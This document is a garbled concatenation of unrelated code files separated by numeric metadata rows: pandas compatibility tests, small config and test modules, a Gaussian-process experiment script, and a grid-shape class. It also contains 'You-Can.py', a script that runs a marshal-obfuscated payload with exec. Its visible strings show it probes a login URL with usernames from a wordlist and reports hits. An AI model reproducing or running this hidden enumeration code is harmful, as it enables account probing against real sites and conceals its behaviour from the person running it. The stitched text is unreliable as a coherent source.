s = pd.Series(dtype=int)
result = pandas.assert_series_equal(
s,
s,
check_less_precise=2,
check_category_order=True,
check_flags=False,
check_freq=False,
rtol=0.5,
)
self.assertFalse(result)
args = dict(self.assert_series_equal_args)
args["check_less_precise"] = 2
args["check_category_order"] = True
# drop args from other versions
del args["check_freq"]
del args["check_flags"]
del args["rtol"]
del args["atol"]
del args["check_index"]
assert_series_equal.assert_called_once_with(s, s, **args)
@patch("kats.compat.pandas.version", compat.Version("1.1"))
@patch("kats.compat.pandas.pdt.assert_index_equal")
@patch("kats.compat.pandas.pdt.assert_series_equal")
def test_assert_series_equal_11(
# pyre-fixme[2]: Parameter annotation cannot be `Any`.
self, assert_series_equal: Any, assert_index_equal: Any
) -> None:
# Check that on pandas 1.1, `check_less_precise` is passed and not later args
assert_series_equal.return_value = False
s = pd.Series(dtype=int)
result = pandas.assert_series_equal(
s,
s,
check_less_precise=2,
check_category_order=True,
check_flags=False,
check_freq=False,
rtol=0.5,
)
self.assertFalse(result)
args = dict(self.assert_series_equal_args)
args["check_category_order"] = True
args["check_freq"] = False
args["rtol"] = 0.5
# drop args from other versions
del args["check_less_precise"]
del args["check_flags"]
del args["check_index"]
assert_series_equal.assert_called_once_with(s, s, **args)
@patch("kats.compat.pandas.version", compat.Version("1.2"))
@patch("kats.compat.pandas.pdt.assert_index_equal")
@patch("kats.compat.pandas.pdt.assert_series_equal")
def test_assert_series_equal_12(
# pyre-fixme[2]: Parameter annotation cannot be `Any`.
self, assert_series_equal: Any, assert_index_equal: Any
) -> None:
# Check that on pandas 1.2, `check_less_precise` is not passed and not later args
assert_series_equal.return_value = False
s = pd.Series(dtype=int)
result = pandas.assert_series_equal(
s,
s,
check_less_precise=2,
check_category_order=True,
check_flags=False,
check_freq=False,
rtol=0.5,
)
self.assertFalse(result)
args = dict(self.assert_series_equal_args)
args["check_category_order"] = True
args["check_freq"] = False
args["check_flags"] = False
args["rtol"] = 0.5
# drop args from other versions
del args["check_less_precise"]
del args["check_index"]
assert_series_equal.assert_called_once_with(s, s, **args)
@patch("kats.compat.pandas.version", compat.Version("1.3"))
@patch("kats.compat.pandas.pdt.assert_index_equal")
@patch("kats.compat.pandas.pdt.assert_series_equal")
def test_assert_series_equal_13(
# pyre-fixme[2]: Parameter annotation cannot be `Any`.
self, assert_series_equal: Any, assert_index_equal: Any
) -> None:
assert_series_equal.return_value = False
s = pd.Series(dtype=int)
result = pandas.assert_series_equal(
s,
s,
check_less_precise=2,
check_category_order=True,
check_flags=False,
check_freq=False,
rtol=0.5,
check_index=False,
)
self.assertFalse(result)
args = dict(self.assert_series_equal_args)
args["check_category_order"] = True
args["check_freq"] = False
args["check_flags"] = False
args["rtol"] = 0.5
args["check_index"] = False
# drop args from other versions
del args["check_less_precise"]
assert_series_equal.assert_called_once_with(s, s, **args)
if __name__ == "__main__":
unittest.main()
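# The tests above pin down which keyword arguments the kats.compat.pandas
# shim forwards on each pandas version. A hedged sketch of that style of
# version-gated forwarding (hypothetical; not the actual kats implementation):
import pandas as pd
import pandas.testing as pdt

PANDAS_VERSION = tuple(int(p) for p in pd.__version__.split(".")[:2])

def compat_assert_frame_equal(left, right, **kwargs):
    if PANDAS_VERSION >= (1, 1):
        # rtol/atol replaced check_less_precise starting with pandas 1.1
        kwargs.pop("check_less_precise", None)
    else:
        kwargs.pop("rtol", None)
        kwargs.pop("atol", None)
    if PANDAS_VERSION < (1, 2):
        # check_flags only exists on pandas >= 1.2
        kwargs.pop("check_flags", None)
    return pdt.assert_frame_equal(left, right, **kwargs)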
| 38.416309
| 89
| 0.634566
| 1,168
| 8,951
| 4.605308
| 0.100171
| 0.082543
| 0.116936
| 0.081986
| 0.873768
| 0.861684
| 0.852389
| 0.852389
| 0.846068
| 0.841049
| 0
| 0.014116
| 0.256061
| 8,951
| 232
| 90
| 38.581897
| 0.793663
| 0.119316
| 0
| 0.746114
| 0
| 0
| 0.170887
| 0.094923
| 0
| 0
| 0
| 0.00431
| 0.378238
| 1
| 0.051813
| false
| 0
| 0.031088
| 0
| 0.103627
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
966b5dc82a242f3d339736d5c5830bf7e337f437
| 104
|
py
|
Python
|
FastAPISQLAlchamyGraphQL/app/conf/__init__.py
|
scionoftech/FastAPI-Full-Stack-Samples
|
e7d42661ed59324ff20f419d05c6cd1e7dab7e97
|
[
"MIT"
] | 29
|
2021-03-31T02:42:59.000Z
|
2022-03-12T16:20:05.000Z
|
FastAPISQLAlchamy/app/conf/__init__.py
|
scionoftech/FastAPI-Full-Stack-Samples
|
e7d42661ed59324ff20f419d05c6cd1e7dab7e97
|
[
"MIT"
] | null | null | null |
FastAPISQLAlchamy/app/conf/__init__.py
|
scionoftech/FastAPI-Full-Stack-Samples
|
e7d42661ed59324ff20f419d05c6cd1e7dab7e97
|
[
"MIT"
] | 4
|
2021-08-21T01:02:00.000Z
|
2022-01-09T15:33:51.000Z
|
from .config import ProjectSettings
from .config import DBSettings
from .config import EmailSettings
| 26
| 36
| 0.826923
| 12
| 104
| 7.166667
| 0.5
| 0.348837
| 0.55814
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.144231
| 104
| 3
| 37
| 34.666667
| 0.966292
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
fb6108fcd422c819e467bf6cffe636b88988ac98
| 182
|
py
|
Python
|
parser/generation/generation.py
|
zhangshyue/regex-library
|
69a26b580bcc94f95dda3536cd790fb59c81a31b
|
[
"MIT"
] | null | null | null |
parser/generation/generation.py
|
zhangshyue/regex-library
|
69a26b580bcc94f95dda3536cd790fb59c81a31b
|
[
"MIT"
] | null | null | null |
parser/generation/generation.py
|
zhangshyue/regex-library
|
69a26b580bcc94f95dda3536cd790fb59c81a31b
|
[
"MIT"
] | null | null | null |
# Internal imports
from extraction.extraction import FoundExpression
def generate(parsed_expression, exp: FoundExpression):
# Write the actual data out to a PB message
pass
| 26
| 54
| 0.785714
| 23
| 182
| 6.173913
| 0.913043
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.17033
| 182
| 7
| 55
| 26
| 0.940397
| 0.318681
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
83a18c57e22ae39b6567b0bc0c30dc882c14c7f5
| 433
|
py
|
Python
|
tests/internal/encryption_support/test_encryption_support_unsupported_auto.py
|
frolovv/aws.ec2.compare
|
582805823492f833d65c0441c4a14dce697c12aa
|
[
"Apache-2.0"
] | null | null | null |
tests/internal/encryption_support/test_encryption_support_unsupported_auto.py
|
frolovv/aws.ec2.compare
|
582805823492f833d65c0441c4a14dce697c12aa
|
[
"Apache-2.0"
] | null | null | null |
tests/internal/encryption_support/test_encryption_support_unsupported_auto.py
|
frolovv/aws.ec2.compare
|
582805823492f833d65c0441c4a14dce697c12aa
|
[
"Apache-2.0"
] | 1
|
2021-12-15T11:58:22.000Z
|
2021-12-15T11:58:22.000Z
|
# Testing module encryption_support.unsupported
import pytest
import ec2_compare.internal.encryption_support.unsupported
def test_get_internal_data_encryption_support_unsupported_get_instances_list():
assert len(ec2_compare.internal.encryption_support.unsupported.get_instances_list()) > 0
def test_get_internal_data_encryption_support_unsupported_get():
assert len(ec2_compare.internal.encryption_support.unsupported.get) > 0
| 43.3
| 90
| 0.877598
| 56
| 433
| 6.339286
| 0.339286
| 0.287324
| 0.473239
| 0.349296
| 0.828169
| 0.828169
| 0.625352
| 0.625352
| 0.625352
| 0
| 0
| 0.012285
| 0.060046
| 433
| 9
| 91
| 48.111111
| 0.859951
| 0.103926
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 9
|
79193a1a6434b81833234d4905a806bc2b445431
| 180
|
py
|
Python
|
custom/icds_reports/utils/connections.py
|
tobiasmcnulty/commcare-hq
|
234aa1fba98a96de1b625bbd70b2066fc877eed1
|
[
"BSD-3-Clause"
] | 1
|
2020-07-14T13:00:23.000Z
|
2020-07-14T13:00:23.000Z
|
custom/icds_reports/utils/connections.py
|
tobiasmcnulty/commcare-hq
|
234aa1fba98a96de1b625bbd70b2066fc877eed1
|
[
"BSD-3-Clause"
] | null | null | null |
custom/icds_reports/utils/connections.py
|
tobiasmcnulty/commcare-hq
|
234aa1fba98a96de1b625bbd70b2066fc877eed1
|
[
"BSD-3-Clause"
] | null | null | null |
from corehq.sql_db.connections import get_db_alias_or_none, ICDS_UCR_CITUS_ENGINE_ID
def get_icds_ucr_citus_db_alias():
return get_db_alias_or_none(ICDS_UCR_CITUS_ENGINE_ID)
| 30
| 84
| 0.872222
| 34
| 180
| 3.970588
| 0.5
| 0.155556
| 0.266667
| 0.177778
| 0.533333
| 0.533333
| 0.533333
| 0.533333
| 0.533333
| 0.533333
| 0
| 0
| 0.083333
| 180
| 5
| 85
| 36
| 0.818182
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 8
|
f7038372acea8564b8305e0beb5f6d7f87ed3aa9
| 6,454
|
py
|
Python
|
experiments/increasing_dim/Exp_1/kron.py
|
vdutor/VFF
|
459be5b480bba49e8c15dc7daeca5fd1ddd762df
|
[
"Apache-2.0"
] | 75
|
2016-11-21T21:50:12.000Z
|
2022-03-22T17:56:36.000Z
|
experiments/increasing_dim/Exp_1/kron.py
|
vdutor/VFF
|
459be5b480bba49e8c15dc7daeca5fd1ddd762df
|
[
"Apache-2.0"
] | 4
|
2018-03-22T19:47:08.000Z
|
2021-10-06T14:49:54.000Z
|
experiments/increasing_dim/Exp_1/kron.py
|
vdutor/VFF
|
459be5b480bba49e8c15dc7daeca5fd1ddd762df
|
[
"Apache-2.0"
] | 26
|
2016-11-22T14:14:58.000Z
|
2022-02-03T18:29:20.000Z
|
import numpy as np
import pandas as pd  # needed for the results DataFrames below
import sys
import gpflow
import VFF
from sklearn.cluster import KMeans  # needed for the sparse-GP baselines below
from time import time
from config import *
dim = sys.argv[1]
rep = sys.argv[2]
print('vff: dimension {}, replicate {}'.format(dim, rep))
# data
data = np.load('data/data_dim{}_rep{}.npz'.format(dim, 0))
# full_gp
def prodkern(dim):
return gpflow.kernels.Prod([gpflow.kernels.Matern32(1, active_dims=[i], lengthscales=lengthscale)
for i in range(dim)])
k = prodkern(dim)
m = gpflow.gpr.GPR(data['Xtrain'], data['Ytrain'], kern=k)
m.likelihood.variance = noise_var
data = np.load('data/data_dim{}_rep{}.npz'.format(dim, rep))
marg_lik = m.compute_log_likelihood().squeeze()
mean_log_pred = np.mean(m.predict_density(data['Xtest'], data['Ytest']))
file = open("results/full.csv", "a")
file.write("{}, {}, {}, {}\n".format(dim, rep, marg_lik, mean_log_pred))
file.close()
##########################
# kron
results = pd.DataFrame()
for dim in dimensions:
a, b = -1.5 * np.ones(dim), 1.5 * np.ones(dim)
k = prodkern(dim)
for r in range(repeats):
print('kron replicate ',r,'/',repeats)
data = np.load('data/data_dim{}_rep{}.npz'.format(dim, r))
for M in num_freqs:
if (2*M-1)**dim:
a, b = -0.5 * np.ones(dim), 1.5 * np.ones(dim)
m = VFF.vgp.VGP_kron(data['Xtrain'], data['Ytrain'], np.arange(M), a, b,
kerns=prodkern(dim).kern_list,
likelihood=gpflow.likelihoods.Gaussian(),
use_two_krons=True)
m.likelihood.variance = noise_var
# only optimize q(u)
m.kerns.fixed = True
m.likelihood.fixed = True
start = time()
m.optimize()
marg_lik = m.compute_log_likelihood().squeeze()
mean_log_pred = np.mean(m.predict_density(data['Xtest'], data['Ytest']))
t = time() - start
results = results.append(dict(dim=dim, rep=r, marg_lik=marg_lik,
mean_log_pred=mean_log_pred, time=t,
num_inducing=M),
ignore_index=True)
# do this inside the loop so we can get partial results if something crashes
results.to_csv('results/kron.csv')
##########################
# kron_opt
results = pd.DataFrame()
for dim in dimensions:
a, b = -1.5 * np.ones(dim), 1.5 * np.ones(dim)
k = prodkern(dim)
for r in range(repeats):
print('kron_opt replicate ',r,'/',repeats)
data = np.load('data/data_dim{}_rep{}.npz'.format(dim, r))
for M in num_freqs:
if (2*M-1)**dim:
m = VFF.vgp.VGP_kron(data['Xtrain'], data['Ytrain'], np.arange(M), a, b,
kerns=k.kern_list,
likelihood=gpflow.likelihoods.Gaussian(),
use_two_krons=True)
m.likelihood.variance = noise_var
# build kronecker GP model
start = time()
m.optimize()
marg_lik = m.compute_log_likelihood().squeeze()
mean_log_pred = np.mean(m.predict_density(data['Xtest'], data['Ytest']))
t = time() - start
results = results.append(dict(dim=dim, rep=r, marg_lik=marg_lik,
mean_log_pred=mean_log_pred, time=t,
num_inducing=M),
ignore_index=True)
results.to_csv('results/kron_opt.csv')
##########################
# Sparse
results = pd.DataFrame()
for dim in dimensions:
for r in range(repeats):
print('Sparse replicate ',r,'/',repeats)
data = np.load('data/data_dim{}_rep{}.npz'.format(dim, r))
num_inducing = (2*num_freqs-1)**dim
for M in num_inducing:
if M < 500:
# build sparse GP model
Z = KMeans(n_clusters=M).fit(data['Xtrain']).cluster_centers_
m = gpflow.sgpr.SGPR(data['Xtrain'], data['Ytrain'], Z=Z, kern=prodkern(dim))
m.likelihood.variance = noise_var
start = time()
marg_lik = m.compute_log_likelihood().squeeze()
mean_log_pred = np.mean(m.predict_density(data['Xtest'], data['Ytest']))
t = time() - start
results = results.append(dict(dim=dim, rep=r, marg_lik=marg_lik,
mean_log_pred=mean_log_pred, time=t,
num_inducing=M),
ignore_index=True)
# do this inside the loop so we can get partial results if something crashes
results.to_csv('results/sparse_kmeans.csv')
##########################
# Sparse GP opt
results = pd.DataFrame()
for dim in dimensions:
for r in range(repeats):
print('sparse opt replicate ',r,'/',repeats)
data = np.load('data/data_dim{}_rep{}.npz'.format(dim, r))
num_inducing = (2*num_freqs-1)**dim
for M in num_inducing:
if M < 500:
# build sparse GP model
Z = KMeans(n_clusters=M).fit(data['Xtrain']).cluster_centers_
m = gpflow.sgpr.SGPR(data['Xtrain'], data['Ytrain'], Z=Z, kern=prodkern(dim))
m.likelihood.variance = noise_var
# only optimize Z
m.kern.fixed = True
m.likelihood.fixed = True
start = time()
m.optimize()
marg_lik = m.compute_log_likelihood().squeeze()
mean_log_pred = np.mean(m.predict_density(data['Xtest'], data['Ytest']))
t = time() - start
results = results.append(dict(dim=dim, rep=r, marg_lik=marg_lik,
mean_log_pred=mean_log_pred, time=t,
num_inducing=M),
ignore_index=True)
# do this inside the loop so we can get partial results if something crashes
results.to_csv('results/sparse_opt.csv')
##########################
#
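# DataFrame.append, used throughout the loops above, was removed in pandas
# 2.0. A minimal sketch of the same bookkeeping that collects row dicts in a
# list and builds the frame once (column names as above; values are dummies):
import pandas as pd

rows = []
for dim in (1, 2):          # stand-in for `dimensions` from config
    for r in range(2):      # stand-in for `repeats` from config
        rows.append(dict(dim=dim, rep=r, marg_lik=0.0,
                         mean_log_pred=0.0, time=0.0, num_inducing=8))
results = pd.DataFrame(rows)
results.to_csv('results/kron.csv')  # assumes the results/ directory exists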
| 37.523256
| 101
| 0.503719
| 775
| 6,454
| 4.046452
| 0.165161
| 0.03125
| 0.049107
| 0.026786
| 0.85236
| 0.829401
| 0.829401
| 0.821747
| 0.819834
| 0.814094
| 0
| 0.007694
| 0.355593
| 6,454
| 171
| 102
| 37.74269
| 0.746333
| 0.058413
| 0
| 0.741379
| 0
| 0
| 0.083137
| 0.033221
| 0
| 0
| 0
| 0
| 0
| 1
| 0.008621
| false
| 0
| 0.051724
| 0.008621
| 0.068966
| 0.043103
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f75efe55e0752308a88d8a370ac20d517a61aa6c
| 3,481
|
py
|
Python
|
You-Can.py
|
suliman3177/kingusa123
|
6cd83198f6c42184c584bdf1a96a3167ddf2a71d
|
[
"MIT"
] | null | null | null |
You-Can.py
|
suliman3177/kingusa123
|
6cd83198f6c42184c584bdf1a96a3167ddf2a71d
|
[
"MIT"
] | null | null | null |
You-Can.py
|
suliman3177/kingusa123
|
6cd83198f6c42184c584bdf1a96a3167ddf2a71d
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python3 -B
# coded by: VIGITMHS
# I am not a hacker
import marshal as m
data = m.loads(b'\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\t\x00\x00\x00@\x00\x00\x00s\xc0\x00\x00\x00d\x00d\x01l\x00Z\x00d\x00d\x01l\x01Z\x01d\x00d\x02l\x02m\x03Z\x03\x01\x00d\x03Z\x04d\x04Z\x05d\x05Z\x06d\x06Z\x07d\x07Z\x08e\x03Z\te\tj\nd\x08d\td\nd\x0bd\x0cd\rd\x0ed\x0fg\x04d\x10d\x11\x8d\x06\x01\x00e\x01\xa0\x0bd\x12\xa1\x01\x01\x00d\x13Z\x0ce\re\x08e\x0c\x17\x00\x83\x01\x01\x00e\x0ed\x14d\x15\x83\x02Z\x0fe\x10e\x04d\x16\x17\x00\x83\x01Z\x11e\x0fD\x00]4Z\x12e\x00\xa0\x13e\x11d\x17\x17\x00e\x12\xa0\x14d\x18\xa1\x01\x17\x00\xa1\x01Z\x15e\x15d\x19k\x02r\x86e\rd\x1ae\x15\x17\x00d\x1b\x17\x00\x83\x01\x01\x00q\x86d\x01S\x00)\x1c\xe9\x00\x00\x00\x00N)\x01\xda\tAnimationz\x07\x1b[0;32mz\x07\x1b[0;30mz\x07\x1b[0;33mz\x07\x1b[0;34mz\x07\x1b[1;30mz\tLoding...z\x03WL#z\x02W#\xfa\x01 \xfa\x01/\xfa\x01-\xfa\x01\\\xfa\x01|g\x9a\x99\x99\x99\x99\x99\xc9?)\x06\xda\x02AT\xda\x03CUT\xda\x03CLT\xda\x04text\xda\x07Loading\xda\x01t\xda\x05cleara{\x06\x00\x00\n .-""""-.\n / ;\n $$P :\n .m._ $ VIGITAMHS:\n dSMMSSSss.__$$b. __ :\n :MMSMMSSSMMMSS$$$b $$P ;\n SMMMSMMSMMMSSS$$$$ :b\n dSMMMSMMMMMMSSMM$$$b.dP SSb.\n dSMMMMMMMMMMSSMMPT$$=-. /TSSSS.\n :SMMMSMMMMMMMSMMP `$b_.\' MMMMSS.\n SMMMMMSMMMMMMMMM \\ .\'\\ :SMMMSSS.\n dSMSSMMMSMMMMMMMM \\/\\_/; .\'SSMMMMSSSm\n dSMMMMSMMSMMMMMMMM :.;\'" :SSMMMMSSMM;\n .MMSSSSSMSSMMMMMMMM; :.; MMSMMMMSMMM;\n dMSSMMSSSSSSSMMMMMMM; ;.; MMMMMMMSMMM\n:MMMSSSSMMMSSP^TMMMMM ;.; MMMMMMMMMMM\nMMMSMMMMSSSSP `MMMM ;.; :MMMMMMMMM;\n"TMMMMMMMMMM TM; :`.: MMMMMMMMM;\n )MMMMMMM; _/\\ :`.: :MMMMMMMM\n d$SS$$$MMMb. |._\\ :`.: MMMMMMMM\n T$$S$$$$$$$$$$m;O\\"-;`.:_.- MMMMMMM;\n :$$$$$$$$$$$$$$$b_l./\\ ;`.: mMMSSMMM;\n :$$$$$$$$$$$$$$$$$$$./\\;`.: .$$MSMMMMMM\n $$$$$$$$$$$$$$$$$$$$. \\`.:.$$$$SMSSSMMM;\n $$$$$$$$$$$$$$$$$$$$$. \\.:$$$$$SSMMMMMMM\n :$$$$$$$$$$$$$$$$$$$$$.//.:$$$$SSSSSSSMM;\n :$$$$$$$$$$$$$$$$$$$$$$.`.:$$SSSSSSSMMMP\n $$$$$$$$$;"^$J "^$$$$;.`.$$P `SSSMMMM\n :$$$$$$$$$ :$$$;.`.P\'.. TMMM$$b\n :$$$$$$$$$; $$$$;.`/ c^\' d$$$$$S;\n $$$$$S$$$$; \'^^^:_d$g:___.$$$$$$SSS\n $$$$SS$$$$;coded by $$$$$$$$$$$$$$SSS;\n :$$$SSSS$$$$=>VIGITAMHS : $$$$$$$$$$$$$SSS\n :$P"TSSSS$$$ ; $$$$$$$$$$$$$SSS;\n j `SSSSS$ : :$$$$$$$$$$$$$SS$\n : "^S^\' : $$$$$$$$$$$$$S$;\n ;.____.-;" "--^$$$$$$$$$$$$$P\n \'-....-" ""^^T$$$$P"\n [+] - my channel in telegram:\n =>https://t.me/ERROR404VIGITAMHS\n z\rvigitamhs.txt\xda\x01rz\x0eEnter A url==>z\x10/login?username=\xda\x01\nz\x19http://1.1.1.1.com/statusz\tFound => z\x08 Found !)\x16\xda\x08requests\xda\x02os\xda\x0eN4Tools.Designr\x02\x00\x00\x00\xda\x01G\xda\x01R\xda\x01Y\xda\x01B\xda\x02Bl\xda\x01A\xda\x04Text\xda\x06systemZ\x02Bs\xda\x05print\xda\x04openZ\x06vigita\xda\x05inputZ\x03mhs\xda\x01m\xda\x03get\xda\x06rstripr\x0f\x00\x00\x00\xa9\x00r"\x00\x00\x00r"\x00\x00\x00\xfa\x0b<N404-Tool>\xda\x08<module>\x01\x00\x00\x00s2\x00\x00\x00\x08\x01\x08\x01\x0c\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x02\x01\x02\x01\x02\x01\x02\x01\n\x01\x02\xfa\x06\x08\n\x01\x04*\x0c\x01\n\x02\x0c\x01\x08\x01\x18\x01\x08\x01')
exec (data)
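# exec() above runs whatever the opaque marshal blob contains. A safer way to
# inspect such a payload is to deserialize and disassemble it without ever
# executing it (standard library only):
import dis
import marshal as m2

def inspect_payload(raw: bytes) -> None:
    code = m2.loads(raw)    # rebuilds the code object; runs nothing
    print(code.co_consts)   # embedded constants, strings, nested code objects
    dis.dis(code)           # human-readable bytecode listing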
| 580.166667
| 3,390
| 0.559322
| 516
| 3,481
| 3.736434
| 0.428295
| 0.102697
| 0.102697
| 0.093361
| 0.099585
| 0.076245
| 0.076245
| 0.063797
| 0.048237
| 0.048237
| 0
| 0.181118
| 0.141913
| 3,481
| 6
| 3,391
| 580.166667
| 0.464346
| 0.014938
| 0
| 0
| 0
| 0.666667
| 0.683304
| 0.392294
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.333333
| 0
| 0.333333
| 0.333333
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
f760c218e50b9c6a0ae0262311f284f08a5ff5d8
| 3,488
|
py
|
Python
|
cgi-bin/tools/shapes.py
|
quartzcms/Learning-Bot
|
2ca01ce3bfe724f82681b86d79570c3665bc0541
|
[
"MIT"
] | 2
|
2019-03-17T02:51:44.000Z
|
2019-11-24T02:44:09.000Z
|
cgi-bin/tools/shapes.py
|
quartzcms/Learning-Bot
|
2ca01ce3bfe724f82681b86d79570c3665bc0541
|
[
"MIT"
] | null | null | null |
cgi-bin/tools/shapes.py
|
quartzcms/Learning-Bot
|
2ca01ce3bfe724f82681b86d79570c3665bc0541
|
[
"MIT"
] | null | null | null |
import sys
import cgi
import os
class Shapes():
def __init__(self, form, output):
self.form = form
self.output = output
def ovale(self, grid, size, pointsWH):
x = (size[0] // 5)
for i, array in enumerate(grid):
spacing_height = round(((pointsWH[1][1] - pointsWH[1][0]) / 2) - (size[1] / 2))
bottom_side = round(spacing_height + size[1] + pointsWH[1][0])
top_side = round(spacing_height + pointsWH[1][0])
if i >= top_side and i <= bottom_side:
if i == round(top_side + (size[1] / 2)):
x = (size[0] // 5)
for j, value in enumerate(array):
spacing_width = round(((pointsWH[0][1] - pointsWH[0][0]) / 2) - (size[0] / 2))
right_side = round(spacing_width + size[0] + pointsWH[0][0])
left_side = round(spacing_width + pointsWH[0][0])
if i >= round(top_side + (size[1] / 2)):
x_side_left = round(left_side + x)
x_side_right = round(right_side - x)
else:
x_side_left = round((left_side + (size[0] / 2)) - x)
x_side_right = round((left_side + (size[0] / 2)) + x)
if j >= left_side and j <= right_side and j >= x_side_left and j <= x_side_right:
grid[i][j] = '1'
x += (size[0] // 5)
return grid
def triangle_up(self, grid, size, pointsWH):
x = 1
for i, array in enumerate(grid):
spacing_height = round(((pointsWH[1][1] - pointsWH[1][0]) / 2) - (size[1] / 2))
bottom_side = round(spacing_height + size[1] + pointsWH[1][0])
top_side = round(spacing_height + pointsWH[1][0])
if i >= top_side and i <= bottom_side:
for j, value in enumerate(array):
spacing_width = round(((pointsWH[0][1] - pointsWH[0][0]) / 2) - (size[0] / 2))
right_side = round(spacing_width + size[0] + pointsWH[0][0])
left_side = round(spacing_width + pointsWH[0][0])
x_side_left = round((left_side + (size[0] / 2)) - x)
x_side_right = round((left_side + (size[0] / 2)) + x)
if j >= left_side and j <= right_side and j >= x_side_left and j <= x_side_right:
grid[i][j] = '1'
x += 1
return grid
def triangle_down(self, grid, size, pointsWH):
x = 1
for i, array in enumerate(grid):
spacing_height = round(((pointsWH[1][1] - pointsWH[1][0]) / 2) - (size[1] / 2))
bottom_side = round(spacing_height + size[1] + pointsWH[1][0])
top_side = round(spacing_height + pointsWH[1][0])
if i >= top_side and i <= bottom_side:
for j, value in enumerate(array):
spacing_width = round(((pointsWH[0][1] - pointsWH[0][0]) / 2) - (size[0] / 2))
right_side = round(spacing_width + size[0] + pointsWH[0][0])
left_side = round(spacing_width + pointsWH[0][0])
x_side_left = round(left_side + x)
x_side_right = round(right_side - x)
if j >= left_side and j <= right_side and j >= x_side_left and j <= x_side_right:
grid[i][j] = '1'
x += 1
return grid
def rectangle(self, grid, size, pointsWH):
for i, array in enumerate(grid):
spacing_height = round(((pointsWH[1][1] - pointsWH[1][0]) / 2) - (size[1] / 2))
bottom_side = round(spacing_height + size[1] + pointsWH[1][0])
top_side = round(spacing_height + pointsWH[1][0])
if i >= top_side and i <= bottom_side:
for j, value in enumerate(array):
spacing_width = round(((pointsWH[0][1] - pointsWH[0][0]) / 2) - (size[0] / 2))
right_side = round(spacing_width + size[0] + pointsWH[0][0])
left_side = round(spacing_width + pointsWH[0][0])
if j >= left_side and j <= right_side:
grid[i][j] = '1'
return grid
def main():
pass
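# A minimal usage sketch for the Shapes helpers above. The argument shapes are
# inferred from the arithmetic: `grid` is a list of rows of '0' strings,
# `size` is (width, height), and `pointsWH` is [[x_min, x_max], [y_min, y_max]].
if __name__ == '__main__':
    grid = [['0'] * 40 for _ in range(20)]
    shapes = Shapes(form=None, output=None)
    grid = shapes.rectangle(grid, size=(10, 6), pointsWH=[[0, 40], [0, 20]])
    print('\n'.join(''.join(row) for row in grid))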
| 41.035294
| 86
| 0.608658
| 567
| 3,488
| 3.567901
| 0.081129
| 0.071181
| 0.126545
| 0.0435
| 0.903114
| 0.886802
| 0.886802
| 0.886802
| 0.875927
| 0.85566
| 0
| 0.044771
| 0.21875
| 3,488
| 85
| 87
| 41.035294
| 0.697615
| 0
| 0
| 0.772152
| 0
| 0
| 0.001146
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.075949
| false
| 0.012658
| 0.037975
| 0
| 0.177215
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e3c0f60de3ee6d2a07aa66810c5957d07b470442
| 50,979
|
py
|
Python
|
aioes/client/indices.py
|
DLizogub/aioes
|
51658066f35699e871c8ba02e133b725043dcb84
|
[
